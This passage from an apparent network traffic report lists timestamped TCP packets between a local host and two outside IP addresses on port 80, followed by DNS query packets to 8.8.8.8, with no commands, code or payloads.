                                      Jul 15, 2021 12:44:54.096530914 CEST4984980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:54.116213083 CEST8049849172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:54.116290092 CEST4984980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:54.119128942 CEST4984980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:54.138798952 CEST8049849172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:54.138875008 CEST4984980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:54.158567905 CEST8049849172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:54.455528975 CEST8049849172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:54.455554962 CEST8049849172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:54.455724001 CEST4984980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:54.455790997 CEST4984980192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:54.477191925 CEST8049849172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:54.674508095 CEST4985080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:54.692250013 CEST8049850104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:54.692378998 CEST4985080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:54.699547052 CEST4985080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:54.717206001 CEST8049850104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:54.717286110 CEST4985080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:54.734927893 CEST8049850104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:54.971038103 CEST8049850104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:54.971185923 CEST4985080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:54.973436117 CEST8049850104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:54.975089073 CEST4985080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:54.988871098 CEST8049850104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:55.170639992 CEST4985180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.190051079 CEST8049851172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.190165043 CEST4985180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.197726011 CEST4985180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.217284918 CEST8049851172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.217361927 CEST4985180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.236812115 CEST8049851172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.471668959 CEST8049851172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.471775055 CEST8049851172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.471826077 CEST4985180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.471857071 CEST4985180192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.491451025 CEST8049851172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.685872078 CEST4985280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.703404903 CEST8049852172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.703512907 CEST4985280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.710877895 CEST4985280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.728425980 CEST8049852172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.728506088 CEST4985280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.746016026 CEST8049852172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.970537901 CEST8049852172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.970623016 CEST4985280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.970844984 CEST8049852172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:55.970887899 CEST4985280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:55.988050938 CEST8049852172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.187086105 CEST4985380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.206845999 CEST8049853172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.206964970 CEST4985380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.214617014 CEST4985380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.234302044 CEST8049853172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.234385967 CEST4985380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.254189968 CEST8049853172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.479937077 CEST8049853172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.479963064 CEST8049853172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.480022907 CEST4985380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.480041981 CEST4985380192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.500049114 CEST8049853172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.692899942 CEST4985480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.710539103 CEST8049854172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.710618019 CEST4985480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.714370966 CEST4985480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.731803894 CEST8049854172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.731878996 CEST4985480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.749530077 CEST8049854172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.973958015 CEST8049854172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.974014997 CEST8049854172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:56.974189997 CEST4985480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.974215031 CEST4985480192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:56.991704941 CEST8049854172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:57.185668945 CEST4985580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:57.205459118 CEST8049855104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:57.205578089 CEST4985580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:57.212311029 CEST4985580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:57.232108116 CEST8049855104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:57.232202053 CEST4985580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:57.251831055 CEST8049855104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:57.471878052 CEST8049855104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:57.471899033 CEST8049855104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:57.472137928 CEST4985580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:57.472201109 CEST4985580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:57.494468927 CEST8049855104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:57.707665920 CEST4985680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:57.727916956 CEST8049856172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:57.728013039 CEST4985680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:57.731595039 CEST4985680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:57.752053022 CEST8049856172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:57.752129078 CEST4985680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:57.774276972 CEST8049856172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.029711008 CEST8049856172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.029851913 CEST4985680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.030328989 CEST8049856172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.031795025 CEST4985680192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.049535036 CEST8049856172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.241405964 CEST4985780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.258811951 CEST8049857172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.258913994 CEST4985780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.262469053 CEST4985780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.279894114 CEST8049857172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.279959917 CEST4985780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.297382116 CEST8049857172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.558218002 CEST8049857172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.558360100 CEST4985780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.558423042 CEST8049857172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.558466911 CEST4985780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.575771093 CEST8049857172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.777034998 CEST4985880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.796595097 CEST8049858172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.796679974 CEST4985880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.800401926 CEST4985880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.819746971 CEST8049858172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:58.819828987 CEST4985880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:58.839292049 CEST8049858172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:59.062762022 CEST8049858172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:59.062834978 CEST8049858172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:59.062871933 CEST4985880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:59.064342022 CEST4985880192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:44:59.082365990 CEST8049858172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:44:59.291678905 CEST4985980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.309479952 CEST8049859104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:59.309679985 CEST4985980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.313235998 CEST4985980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.330959082 CEST8049859104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:59.331041098 CEST4985980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.348808050 CEST8049859104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:59.592097998 CEST8049859104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:59.592123985 CEST8049859104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:59.592200041 CEST4985980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.592236042 CEST4985980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.609878063 CEST8049859104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:59.793432951 CEST4986080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.813065052 CEST8049860104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:59.816452980 CEST4986080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.820403099 CEST4986080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.840075970 CEST8049860104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:44:59.840147972 CEST4986080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:44:59.860079050 CEST8049860104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.086410046 CEST8049860104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.086460114 CEST8049860104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.086524010 CEST4986080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:00.086584091 CEST4986080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:00.106100082 CEST8049860104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.289959908 CEST4986180192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:00.307950020 CEST8049861104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.308104038 CEST4986180192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:00.312026978 CEST4986180192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:00.330590010 CEST8049861104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.330703020 CEST4986180192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:00.348479033 CEST8049861104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.602817059 CEST8049861104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.602839947 CEST8049861104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.604475021 CEST4986180192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:00.604507923 CEST4986180192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:00.622278929 CEST8049861104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:00.818087101 CEST4986280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:00.837758064 CEST8049862172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:00.837863922 CEST4986280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:00.841449022 CEST4986280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:00.861188889 CEST8049862172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:00.861264944 CEST4986280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:00.883093119 CEST8049862172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:01.109972000 CEST8049862172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:01.109991074 CEST8049862172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:01.110110998 CEST4986280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:01.110202074 CEST4986280192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:01.130738974 CEST8049862172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:01.347803116 CEST4986380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:01.365699053 CEST8049863104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:01.368583918 CEST4986380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:01.372534990 CEST4986380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:01.390172005 CEST8049863104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:01.392554045 CEST4986380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:01.410109997 CEST8049863104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:01.740328074 CEST8049863104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:01.740349054 CEST8049863104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:01.740452051 CEST4986380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:01.740541935 CEST4986380192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:01.758335114 CEST8049863104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:01.955760002 CEST4986480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:01.976540089 CEST8049864104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:01.976634026 CEST4986480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:01.980263948 CEST4986480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:01.999839067 CEST8049864104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:01.999903917 CEST4986480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:02.019470930 CEST8049864104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:02.515789986 CEST8049864104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:02.515976906 CEST4986480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:02.516196012 CEST8049864104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:02.516253948 CEST4986480192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:02.535764933 CEST8049864104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:02.741209030 CEST4986580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:02.759959936 CEST8049865104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:02.760070086 CEST4986580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:02.763633966 CEST4986580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:02.782778978 CEST8049865104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:02.782844067 CEST4986580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:02.800848007 CEST8049865104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:03.475857973 CEST8049865104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:03.475980997 CEST4986580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:03.476003885 CEST8049865104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:03.476049900 CEST4986580192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:03.493693113 CEST8049865104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:03.688261986 CEST4986680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:03.707858086 CEST8049866104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:03.707952023 CEST4986680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:03.711816072 CEST4986680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:03.731976986 CEST8049866104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:03.732045889 CEST4986680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:03.751544952 CEST8049866104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:04.155195951 CEST8049866104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:04.155308962 CEST8049866104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:04.155364990 CEST4986680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:04.155407906 CEST4986680192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:04.174947023 CEST8049866104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:04.378469944 CEST4986780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:04.395925045 CEST8049867172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:04.396028042 CEST4986780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:04.399651051 CEST4986780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:04.417148113 CEST8049867172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:04.417239904 CEST4986780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:04.435347080 CEST8049867172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:04.688045025 CEST8049867172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:04.688169003 CEST4986780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:04.688482046 CEST8049867172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:04.688534021 CEST4986780192.168.2.3172.67.155.45
                                      Jul 15, 2021 12:45:04.705802917 CEST8049867172.67.155.45192.168.2.3
                                      Jul 15, 2021 12:45:04.907700062 CEST4986880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:04.928239107 CEST8049868104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:04.928334951 CEST4986880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:04.939384937 CEST4986880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:04.959194899 CEST8049868104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:04.959274054 CEST4986880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:04.980212927 CEST8049868104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:05.224467993 CEST8049868104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:05.224503994 CEST8049868104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:05.224558115 CEST4986880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:05.224613905 CEST4986880192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:05.244323015 CEST8049868104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:05.438776016 CEST4986980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:05.456342936 CEST8049869104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:05.456443071 CEST4986980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:05.460170984 CEST4986980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:05.477766037 CEST8049869104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:05.477870941 CEST4986980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:05.495352030 CEST8049869104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:05.762335062 CEST8049869104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:05.762811899 CEST8049869104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:05.764637947 CEST4986980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:05.764801025 CEST4986980192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:05.782177925 CEST8049869104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:06.014894962 CEST4987080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:06.035809040 CEST8049870104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:06.035922050 CEST4987080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:06.039547920 CEST4987080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:06.061465979 CEST8049870104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:06.061554909 CEST4987080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:06.083473921 CEST8049870104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:06.328779936 CEST8049870104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:06.328896999 CEST4987080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:06.329159021 CEST8049870104.21.6.222192.168.2.3
                                      Jul 15, 2021 12:45:06.330434084 CEST4987080192.168.2.3104.21.6.222
                                      Jul 15, 2021 12:45:06.348401070 CEST8049870104.21.6.222192.168.2.3

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 15, 2021 12:42:56.408528090 CEST6493853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:42:56.420671940 CEST53649388.8.8.8192.168.2.3
                                      Jul 15, 2021 12:42:57.110136986 CEST6015253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:42:57.123498917 CEST53601528.8.8.8192.168.2.3
                                      Jul 15, 2021 12:42:58.074846029 CEST5754453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:42:58.089422941 CEST53575448.8.8.8192.168.2.3
                                      Jul 15, 2021 12:42:58.310540915 CEST5598453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:42:58.328886032 CEST53559848.8.8.8192.168.2.3
                                      Jul 15, 2021 12:42:59.258120060 CEST6418553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:42:59.271111012 CEST53641858.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:00.385386944 CEST6511053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:00.399707079 CEST53651108.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:01.877995014 CEST5836153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:01.892205000 CEST53583618.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:02.916712999 CEST6349253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:02.931401968 CEST53634928.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:04.195559978 CEST6083153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:04.208483934 CEST53608318.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:05.463368893 CEST6010053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:05.477000952 CEST53601008.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:06.146229029 CEST5319553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:06.160268068 CEST53531958.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:08.577842951 CEST5014153192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:08.592020988 CEST53501418.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:10.218507051 CEST5302353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:10.233638048 CEST53530238.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:11.340884924 CEST4956353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:11.354722977 CEST53495638.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:11.977411985 CEST5135253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:11.992255926 CEST53513528.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:12.948087931 CEST5934953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:12.962460041 CEST53593498.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:14.865371943 CEST5708453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:14.878199100 CEST53570848.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:16.283488035 CEST5882353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:16.298026085 CEST53588238.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:17.575536013 CEST5756853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:17.589318037 CEST53575688.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:32.086585999 CEST5054053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:32.127585888 CEST53505408.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:32.575974941 CEST5436653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:32.589121103 CEST53543668.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:47.827604055 CEST5303453192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:47.855693102 CEST53530348.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:48.392527103 CEST5776253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:48.415952921 CEST53577628.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:48.819869995 CEST5543553192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:48.846921921 CEST53554358.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:49.451843023 CEST5071353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:49.465328932 CEST53507138.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:50.076349020 CEST5613253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:50.106607914 CEST53561328.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:50.912091970 CEST5898753192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:50.925728083 CEST53589878.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:51.491405010 CEST5657953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:51.506958961 CEST53565798.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:52.616329908 CEST6063353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:52.631071091 CEST53606338.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:54.146442890 CEST6129253192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:54.160015106 CEST53612928.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:54.729552031 CEST6361953192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:54.743144035 CEST53636198.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:55.242336035 CEST6493853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:55.255378008 CEST53649388.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:55.956191063 CEST6194653192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:55.971553087 CEST53619468.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:56.500670910 CEST6491053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:56.516213894 CEST5212353192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:56.527985096 CEST53649108.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:56.530544996 CEST53521238.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:57.095279932 CEST5613053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:57.108472109 CEST53561308.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:57.681431055 CEST5633853192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:57.695081949 CEST53563388.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:58.220237970 CEST5942053192.168.2.38.8.8.8
                                      Jul 15, 2021 12:43:58.234225988 CEST53594208.8.8.8192.168.2.3
                                      Jul 15, 2021 12:43:58.878668070 CEST5878453192.168.2.38.8.8.8
